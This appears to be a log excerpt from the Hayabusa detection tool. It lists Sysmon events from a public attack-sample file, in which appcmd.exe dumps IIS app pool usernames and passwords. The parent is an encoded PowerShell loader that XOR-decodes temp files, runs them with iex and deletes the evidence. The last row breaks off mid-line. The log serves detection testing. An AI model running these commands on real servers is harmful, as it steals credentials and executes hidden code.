Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Line Number: 0"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACA